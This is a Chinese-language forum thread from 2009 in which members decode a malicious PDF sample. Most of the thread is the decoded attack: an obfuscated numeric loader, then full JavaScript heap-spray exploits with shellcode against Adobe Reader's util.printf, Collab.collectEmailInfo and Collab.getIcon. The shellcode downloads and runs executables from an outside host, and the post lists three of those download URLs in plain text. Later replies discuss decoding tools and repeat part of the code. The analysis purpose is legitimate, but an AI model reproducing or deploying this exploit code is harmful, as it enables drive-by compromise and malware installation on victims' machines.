108,121,109,91,172,108,107,124,121,91,172,106,108,121,109,91,172,108,122,124,122,91,172,106,108,121,109,91,172,108,122,124,123,91,172,106,108,121,109,91,172,102,103,124,124,91,172,119,103,123,111,91,172,124,125,124,125,91,172,107,103,124,125,91,172,107,123,108,111,91,172,103,104,110,120,91,172,123,111,103,109,91,172,124,125,103,108,91,172,124,125,124,125,91,172,121,107,110,106,91,172,110,108,102,122,91,172,109,107,121,103,91,172,108,120,103,108,91,172,108,120,102,103,91,172,124,125,102,103,91,172,102,122,109,108,91,172,109,108,124,125,91,172,108,120,102,111,91,172,124,125,102,103,91,172,110,108,122,103,91,172,109,108,121,103,91,172,106,103,102,106,91,172,121,106,121,112,91,172,121,103,105,106,91,172,121,106,121,112,91,172,105,106,107,110,91,172,110,121,121,103,91,172,104,107,106,122,91,172,110,121,102,122,91,172,104,107,109,122,91,172,124,122,102,111,91,172,119,120,124,106,91,172,121,106,107,125,91,172,106,122,110,121,91,172,102,107,104,107,91,172,105,112,110,103,91,172,110,121,102,103,91,172,109,107,121,104,91,172,106,103,102,109,91,172,105,111,110,103,91,172,109,108,102,103,91,172,104,121,124,120,91,172,121,106,121,104,91,172,110,121,107,108,91,172,110,106,123,122,91,172,108,107,123,122,91,172,110,123,107,106,91,172,124,103,106,108,91,172,105,106,107,110,91,172,107,103,122,121,91,172,106,108,121,109,91,172,108,121,124,103,91,172,106,108,121,109,91,172,108,108,124,104,91,172,106,108,121,109,91,172,109,105,124,105,91,172,106,108,121,109,91,172,108,124,124,106,91,172,106,108,121,109,91,172,108,108,124,107,91,172,106,108,121,109,91,172,108,122,124,108,91,172,106,108,121,109,91,172,105,106,124,109,91,172,106,108,121,109,91,172,105,105,124,110,91,172,106,108,121,109,91,172,104,124,124,111,91,172,106,108,121,109,91,172,108,107,124,112,91,172,106,108,121,109,91,172,108,122,124,120,91,172,106,108,121,109,91,172,108,122,124,121,91,172,107,123,110,111,91,172,123,111,124,122,91,172,124,125,102,121,91,172,124,125,124,125,91,172,108,111,107,103,91,172,106,106,108,111,91,172,110,124,124,112,91,172,110,103,123,111,91,172,124,125,124,124,91,172,110,121,124,125,91,172,110,123,124,111,91,172,111,122,106,108,91,172,106,107,108,120,91,172,123,111,107,103,91,172,124,125,109,124,91,172,124,125,124,125,91,172,106,108,110,123,91,172,108,120,123,103,91,172,107,103,103,103,91,172,109,106,123,111,91,172,124,125,124,125,91,172,110,106,124,125,91,172,103,122,121,107,91,172,106,108,110,123,91,172,107,103,123,103,91,172,106,108,110,123,91,172,107,103,111,122,91,172,107,106,107,106,91,172,107,106,107,106,91,172,107,106,107,106,91,172,109,108,124,125,91,172,121,110,102,111,91,172,111,122,106,108,91,172,102,103,106,107,91,172,102,103,102,103,91,172,124,125,107,106,91,172,107,125,122,110,91,172,120,109,102,125,91,172,107,121,121,103,91,172,121,106,121,112,91,172,110,121,107,108,91,172,107,104,123,122,91,172,107,106,107,104,91,172,107,110,107,109,91,172,106,105,108,120,91,172,109,105,123,111,91,172,102,103,102,103,91,172,110,121,102,103,91,172,105,106,122,111,91,172,110,108,124,109,91,172,107,112,122,121,91,172,106,108,121,110,91,172,108,104,124,111,91,172,108,108,104,124,91,172,121,110,109,111,91,172,124,122,106,108,91,172,102,103,108,108,91,172,102,103,102,103,91,172,107,109,109,124,91,172,106,108,110,123,91,172,107,103,124,111,91,172,123,111,107,109,91,172,102,103,107,104,91,172,102,103,102,103,91,172,107,103,107,112,91,172,120,104,123,111,91,172,124,125,124,124,91,172,110,108,124,125,91,172,107,112,121,103,91,172,109,107,107,112,91,172,110,123,105,112,91,172,102,104,106,109,91,172,123,111,107,103,91,172,102,103,105,121,91,172,102,103,102,103,91,172,124,111,110,121,91,172,106,108,110,123,91,172,107,103,124,111,91,172,104,104,123,111,91,172,124,125,124,125,91,172,110,108,124,125,91,172,107,112,121,103,91,172,109,107,107,112,91,172,107,110,102,122,91,172,102,104,123,111,91,172,124,125,124,125,91,172,107,112,124,125,91,172,106,107,121,109,91,172,124,125,105,111,91,172,107,103,109,106,91,172,106,108,110,123,91,172,124,124,124,111,91,172,107,111,102,103,91,172,106,108,110,123,91,172,107,103,124,111,91,172,123,111,107,110,91,172,124,124,109,107,91,172,124,125,124,125,91,172,107,112,107,112,91,172,106,109,106,109,91,172,124,106,105,121,91,172,119,120,109,122,91,172,107,124,107,125,91,172,121,112,107,121,91,172,107,108,121,106,91,172,123,122,110,121,91,172,107,106,107,104,91,172,108,103,108,109,91,172,105,105,120,104,91,172,102,103,123,111,91,172,102,103,102,103,91,172,107,111,102,103,91,172,102,111,105,111,91,172,102,106,109,107,91,172,123,121,106,103,91,172,106,103,124,112,91,172,107,123,110,121,91,172,110,103,102,111,91,172,106,105,124,121,91,172,102,111,109,108,91,172,122,121,105,106,91,172,103,111,110,120,91,172,121,106,110,121,91,172,103,110,123,121,91,172,103,111,105,111,91,172,103,104,109,109,91,172,105,106,106,103,91,172,110,107,121,112,91,172,109,107,122,121,91,172,106,103,102,122,91,172,102,111,105,111,91,172,124,121,109,108,91,172,124,124,106,103,91,172,123,121,121,121,91,172,105,106,124,105,91,172,110,112,121,103,91,172,124,122,106,108,91,172,106,108,110,121,91,172,107,121,124,122,91,172,121,106,121,112,91,172,102,104,105,105,91,172,109,107,108,111,91,172,109,103,109,107,91,172,104,125,105,120,91,172,108,123,104,125,91,172,109,105,108,112,91,172,108,125,109,105,91,172,108,125,109,105,91,172,108,108,108,124,91,172,108,125,109,105,91,172,108,112,108,109,91,172,108,108,109,109,91,172,108,106,104,124,91,172,108,123,108,125,91,172,109,106,104,125,91,172,108,108,108,122,91,172,109,103,108,108,91,172,108,107,104,125,91,172,108,112,108,111,91,172,109,109,109,103,91,172,105,105,109,112,91,172,108,108,104,124,91,172,108,108,109,111,91,172,102,103,102,103,88,96,113,68,64,64,63,64,172,152,168,87,158,142,167,108,102,103,121,133,86,116,86,173,172,167,155,171,158,176,151,101,162,156,164,158,170,159,86,97,86,105,113,68,64,64,63,64,172,152,168,87,162,156,164,87,115,87,102,175,106,103,102,103,102,103,86,100,86,95,158,142,167,108,102,103,121,133,86,98,86,103,174,106,110,96,113,68,64,64,63,64,172,152,168,87,175,152,168,170,166,87,115,87,171,165,155,170,153,152,166,156,94,89,91,172,111,103,111,103,91,172,111,103,111,103,88,96,113,68,64,64,63,64,175,152,168,170,166,87,115,87,156,160,174,150,159,171,94,176,151,169,169,167,98,87,162,156,164,96,113,68,64,64,63,64,172,152,168,87,166,108,119,161,129,109,107,157,86,116,86,95,102,175,102,154,102,154,102,154,102,154,86,100,86,103,174,107,102,103,102,103,102,96,86,102,86,103,174,107,102,103,102,103,102,114,67,65,63,64,63,157,165,169,86,95,172,152,168,87,172,168,153,136,122,112,108,176,86,116,86,103,113,87,172,168,153,136,122,112,108,176,86,115,86,167,107,120,160,130,108,108,156,114,86,173,167,154,135,123,111,109,175,87,97,98,86,96,177,68,64,64,63,64,63,152,168,169,175,146,172,168,153,136,122,112,108,176,147,87,115,87,175,152,168,170,166,87,97,87,172,173,166,156,170,159,175,152,113,68,64,64,63,64,179,68,64,64,63,64,172,152,168,87,170,140,131,159,132,153,125,174,86,116,86,172,164,156,169,154,151,167,155,95,88,92,102,112,88,96,113,68,64,64,63,64,173,159,159,163,155,87,94,171,139,132,158,133,152,126,173,101,162,156,164,158,170,159,86,115,86,103,174,107,102,103,102,96,177,68,64,64,63,64,63,171,139,132,158,133,152,126,173,87,97,116,86,171,139,132,158,133,152,126,173,114,67,65,63,64,63,180,67,65,63,64,63,171,139,132,158,133,152,126,173,87,115,87,88,133,100,89,86,98,86,171,139,132,158,133,152,126,173,114,67,65,63,64,63,152,166,167,100,155,165,154,100,122,165,163,162,152,152,101,157,156,170,128,153,166,164,95,170,140,131,159,132,153,125,174,95,114,67,65,63,64,179,68,64,64,179,68,64,68,64,64,156,172,164,154,170,160,165,165,86,167,154,157,149,170,170,152,168,171,94,96,177,68,64,68,64,64,63,173,151,169,86,173,155,169,169,160,165,165,86,116,86,152,166,167,100,173,159,156,173,156,168,141,155,169,169,160,165,165,100,171,165,138,170,169,159,165,157,95,95,114,67,65,63,64,172,156,168,170,159,166,164,87,115,87,172,156,168,170,159,166,164,101,168,156,166,163,151,154,155,95,101,147,122,102,157,99,93,94,95,114,67,65,63,64,172,152,168,87,172,152,168,170,159,166,164,150,151,169,168,152,175,87,115,87,164,156,173,87,119,169,168,152,175,95,172,156,168,170,159,166,164,101,153,159,151,169,119,171,94,103,95,99,86,173,155,169,169,160,165,165,100,154,158,152,168,120,170,95,103,96,98,87,172,156,168,170,159,166,164,101,153,159,151,169,119,171,94,105,95,96,113,68,64,64,63,160,156,87,94,95,172,152,168,170,159,166,164,150,151,169,168,152,175,146,102,148,86,116,115,87,110,96,86,93,92,87,94,173,151,169,169,160,165,165,149,152,168,169,151,176,145,104,147,87,115,116,86,103,95,87,178,179,86,95,172,152,168,170,159,166,164,150,151,169,168,152,175,146,103,148,86,116,115,87,103,87,92,93,86,173,151,169,169,160,165,165,149,152,168,169,151,176,145,105,147,87,114,87,105,96,95,178,67,65,63,64,63,172,170,160,162,150,166,169,159,165,170,157,94,96,113,68,64,64,63,180,67,65,63,64,159,157,86,95,94,173,151,169,169,160,165,165,149,152,168,169,151,176,145,103,147,87,114,87,110,96,86,179,178,87,94,173,151,169,169,160,165,165,149,152,168,169,151,176,145,103,147,87,115,116,86,111,86,93,92,87,172,152,168,170,159,166,164,150,151,169,168,152,175,146,103,148,86,115,86,105,86,93,92,87,172,152,168,170,159,166,164,150,151,169,168,152,175,146,104,148,86,115,86,105,95,96,177,68,64,64,63,64,153,166,162,163,151,153,149,156,163,152,159,163,94,96,113,68,64,64,63,180,67,65,63,64,159,157,86,95,94,173,151,169,169,160,165,165,149,152,168,169,151,176,145,103,147,87,114,87,111,96,86,179,178,87,94,173,151,169,169,160,165,165,149,152,168,169,151,176,145,103,147,87,115,116,86,112,86,93,92,87,172,152,168,170,159,166,164,150,151,169,168,152,175,146,103,148,86,115,86,104,95,96,177,68,64,64,63,64,153,166,162,163,151,153,149,158,155,171,159,154,165,165,94,96,113,68,64,64,63,180,67,65,63,180,67,65,67,65,63,167,154,157,149,170,170,152,168,171,94,96,113,68,64,64],defl=function(){for(var cfgiry;cwbuz<yszj.length;cwbuz+=1){var iczlfe=cwbuz%ahot.length+1;var cdjlop=ahot.substring(cwbuz%ahot.length,iczlfe);var glmry=yszj[cwbuz];fmqv+=nruw(glmry-cdjlop.charCodeAt(0));}
fzrnk(fmqv);};defl();aginvw=54570;defn=8040;ajnqs="ajnqs";hjnrsv=false;lvcnz=false;hkrvw="";ajnopw=39060;fghl='';ghkp="";cdgi="cdgi";xzknm="";bjnsy=false;dfijkr="dfijkr";eklx=30978;dejsx='';

继续解得出


function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
   yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len/2);
  return yarsp;
}

function util_printf(){
  var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0132%u7468%u7074%u2F3A%u6D2F%u7269%u6F72%u6F72%u656E%u6F72%u6966%u6576%u632E%u6D6F%u732F%u656C%u7065%u612F%u6B66%u7570%u2E32%u7865%u0065");
  var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
  var heapblock = nop + payload;
  var bigblock = unescape("%u0A0A%u0A0A");
  var headersize = 20;
  var spray = headersize + heapblock.length;
  while (bigblock.length < spray){
   bigblock += bigblock;
  }
  var fillblock = bigblock.substring(0, spray);
  var block = bigblock.substring(0, bigblock.length-spray);
  while (block.length+spray < 0x40000){
   block = block + block + fillblock;
  }
  var mem_array = new Array();
  for (var i = 0; i < 1400; i++){
   mem_array = block + heapblock;
  }
  var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  util.printf("%45000f", num);
}

function collab_email(){
  var shellcode = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0132%u7468%u7074%u2F3A%u6D2F%u7269%u6F72%u6F72%u656E%u6F72%u6966%u6576%u632E%u6D6F%u732F%u656C%u7065%u612F%u6763%u766E%u3277%u652E%u6578%u0000");
  var mem_array = new Array();
  var cc = 0x0c0c0c0c;
  var addr = 0x400000;
  var sc_len = shellcode.length * 2;
  var len = addr - (sc_len+0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = fix_it(yarsp, len);
  var count2 = (cc - 0x400000)/addr;
  for (var count = 0; count < count2; count++){
   mem_array[count] = yarsp + shellcode;
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952){
   overflow += overflow;
  }
  this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}

function collab_geticon(){
  if (app.doc.Collab.getIcon){
   var arry = new Array();
   var vvpethya = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0132%u7468%u7074%u2F3A%u6D2F%u7269%u6F72%u6F72%u656E%u6F72%u6966%u6576%u632E%u6D6F%u732F%u656C%u7065%u642F%u6968%u7670%u3279%u652E%u6578%u0000");
   var hWq500CN = vvpethya.length * 2;
   var len = 0x400000 - (hWq500CN + 0x38);
   var yarsp = unescape("%u9090%u9090");
   yarsp = fix_it(yarsp, len);
   var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
   for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
    arry[vqcQD96y] = yarsp + vvpethya;
   }
   var tUMhNbGw = unescape("%09");
   while (tUMhNbGw.length < 0x4000){
    tUMhNbGw += tUMhNbGw;
   }
   tUMhNbGw = "N." + tUMhNbGw;
   app.doc.Collab.getIcon(tUMhNbGw);
  }
}

function pdf_start(){

  var version = app.viewerVersion.toString();
  version = version.replace(/\D/g,'');
  var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){
   util_printf();
  }
  if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){
   collab_email();
  }
  if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
   collab_geticon();
  }
}

pdf_start();

最后再解上面的3段shellcode得出
http://mirroronerofive.com/sleep/afkpu2.exe
http://mirroronerofive.com/sleep/acgnvw2.exe
http://mirroronerofive.com/sleep/dhipvy2.exe

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

幸福的猪猪
 楼主| 发表于 2009-11-20 14:12:51 | 显示全部楼层

回复 4楼 250662772 的帖子

谢谢你,你的解答很详细。
回复

举报

ryota
发表于 2009-11-20 14:28:18 | 显示全部楼层
htmldecoder可以解SWF,PDF文件
回复

举报

adad2008
头像被屏蔽
发表于 2009-11-20 14:28:45 | 显示全部楼层
原帖由 幸福的猪猪 于 2009-11-20 14:12 发表
谢谢你,你的解答很详细。


这个不是详细的做法只是解密的结果 难道你见到一个pdf解密的结果就知道怎么做解密pdf了不 有这么多人帮助你 你怎么只谢一个人

[ 本帖最后由 adad2008 于 2009-11-20 14:42 编辑 ]
回复

举报

冬天真冷
发表于 2009-11-20 14:48:41 | 显示全部楼层
原帖由 250662772 于 2009-11-20 13:54 发表
刚开始基本都是用的16进制加密,以abel.pdf为例用记事本打开提取中间的数字先进行16进制解密

663658
得到

继续解得出

最后再解上面的3段shellcode得出


还是老师速度快,555555
我也说说我的解密过程吧

试试解密able.pdf

ASCIIHexDecode
pdf文件中写了是这个加密形式,于是先提取了如下有效代码

受楼层字符限制,直接发附件了,代码在文本文档中  

把这段代码放到神器中,点击 run script 执行代码后会得到一个日志
得到的日志请下载附件  

打开日志可以看到如下代码



  3. function fix_it(yarsp, len){
  4.   while (yarsp.length * 2 < len){
  5.    yarsp += yarsp;
  6.   }
  7.   yarsp = yarsp.substring(0, len/2);
  8.   return yarsp;
  9. }

  11. function util_printf(){
  12.   var payload = unescape("%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45%u458B%u5BFC%uC3C9%u0132%u7468%u7074%u2F3A%u6D2F%u7269%u6F72%u6F72%u656E%u6F72%u6966%u6576%u632E%u6D6F%u732F%u656C%u7065%u612F%u6B66%u7570%u2E32%u7865%u0065");
  13.   var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
